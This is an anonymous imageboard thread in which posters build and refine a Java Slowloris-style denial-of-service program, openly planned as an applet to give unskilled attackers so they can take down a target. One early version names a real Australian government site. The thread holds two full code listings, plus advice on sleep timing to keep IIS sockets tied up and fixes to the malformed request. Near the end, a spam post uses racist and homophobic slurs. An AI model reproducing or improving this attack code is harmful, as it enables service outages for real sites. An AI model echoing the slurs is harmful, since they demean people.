java slowlorris

Shall I continue my endeavour to create a java slowlorris applet?  Idea being to make it into a applet to give to skiddies to dos a target.  This is just barebones theory code, meaning it executes but I'm wandering if the logic used here would be sound enough to bring something down in sufficient quantities.

import java.lang.*;
import java.io.*;
import java.net.*;
import java.awt.*;
import java.awt.event.*;
import javax.swing.*;
import java.util.*;

public class Client {
    public static void main(String[] args) {
        for (int i = 0; i < 5; i++)
    {
        new Sockit();
    }
    }
}

class Sockit {
   public Sockit() {
      try {
     Random r1 = new Random();
         Socket skt = new Socket("host", 80);
     PrintWriter out = new PrintWriter(skt.getOutputStream(), true);
     String request;
     request="GET "+r1.nextInt(9999999)+" HTTP/1.1\r\nHost: aph.gov.au\r\nUser-Agent: Mozilla/4."+r1.nextInt(99)+"

(compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR

3.5.30729; MSOffice 12)\r\nContent-Length: 42\r\n";   
    
     int len = request.length();
     for (int j = 0; j < len; j++) {
         out.println(request.charAt(j));
         System.out.println(request.charAt(j));
         Thread.sleep(200);
         System.out.println("wait over");
    }
      }
      catch(Exception e) {
         System.out.print("Whoops! It didn't work!\n");
      }
   }
}

JAVA

Yes, java.  Since the source has the target, idea would be to give others a zip with applet and html page.  That way there's no "how use loic?"; just "open webpage and let your client do the rest".

Catching an InterruptedException, from Thread.sleep(long) is not necessarily a problem, unless those 200ms are THAT important.  In fact, cutting suddenly to "Whoops!  It didn't work!" might be incorrect depending on the context.
I would analyze that exception separately since it is one case where a failure may not mean "Whoops!  It didn't work!"
catch(InterruptedException i_e) { ... }
catch(Exception e) { ... }

The 200ms is probably going to be reduced, however the sleep is required because of the server the target is using.  IIS will not listen to a socket that isn't sending or waiting to receive.  To work around this if the attacker constantly sends characters then the server will be forced to constantly listen, dedicating resources that could be used for legitimate requests.  200ms will probably be reduced to a random 20 to hopefully stop any TTL on the server socket.

Thank you for pointing our the error handling.  If thread.sleep throws up interrupted exception I'll have it tell Client somehow, output a message and dispose that instance.

I'll try to find a way to automatically determine the maximum sleep time. Just give me some time, since I just accidentally my whole eclipse installation.

Our project needs a name!

anything involving *loris would be boring and somewhat incorrect, since it's not exactly taking the slowloris approach.

I suggest "Slowpoke", or probably "Slowpoke on Caffeine", with the caffeine being a reference to Java.

Updated code.  My error handling isn't the best right now but it hasn't thrown anything at me yet.

Current code opens 50 sockets and sends 100 messages in a constant stream of one character a time.

import java.lang.*;
import java.io.*;
import java.net.*;
import java.awt.*;
import java.awt.event.*;
import javax.swing.*;
import java.util.*;

public class Client extends Thread {
       
    public void run() {
        new Sockit(getId());
    }
   
    public static void main(String[] args) {
   
        for (int i=0; i < 50; i++)
    {
        (new Client()).start();
        System.out.println(i);
    }
    }
}

class Sockit {
   public Sockit(long id)
   {
    try
    {
        Random r1 = new Random();
            Socket skt = new Socket("example.com", 80);
        PrintWriter out = new PrintWriter(skt.getOutputStream(), true);
        String request;
        request="GET "+r1.nextInt(9999999)+" HTTP/1.1\\r\\nHost: example.com\\r\\nUser-Agent: Mozilla/4."+r1.nextInt(99)+" (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\\r\\nContent-Length: 42\\r\\n";   
        int len = request.length();
        for (int g=0; g < 100; g++)
        {
            for (int j = 0; j < len; j++)
            {
                out.println(request.charAt(j));
                //System.out.println(request.charAt(j));
                Thread.sleep(r1.nextInt(20));
                //System.out.println("wait over");
            }
            System.out.println("Thread ID: "+id+" has opened socket and sent message "+g+".");
        }
        skt.close();
    }   
     
      catch(InterruptedException i_e) { System.out.println(id+" Has A Thread Error.\n"); }
      catch(Exception e) { System.out.print(id+" Has A Socket Error.\n"); }
   }
}

The Request in this code is malformed, the format for a GET request is "GET path http_version etc"
In this example it would be "GET / HTTP/1.1 etc"

Thank you for pointing that out.

no, beavis. java is'n good at massive multithreading.
use erlang.
applet idea is good, but not with your way of distributuon

12 GET?

Are you GAY?
Are you a NIGGER?
Are you a GAY NIGGER?

If you answered "Yes" to all of the above questions, then GNAA (GAY NIGGER ASSOCIATION OF AMERICA) might be exactly what you've been looking for!

15 Name: Anonymous 2011-02-04 12:56

Don't change these.

Name:		Email:
Entire Thread Thread List

All trademarks and copyrights on this site are owned by their respective parties. All comments and posts are the responsibility of their own posters.
- Tinychan + 2ch Mode -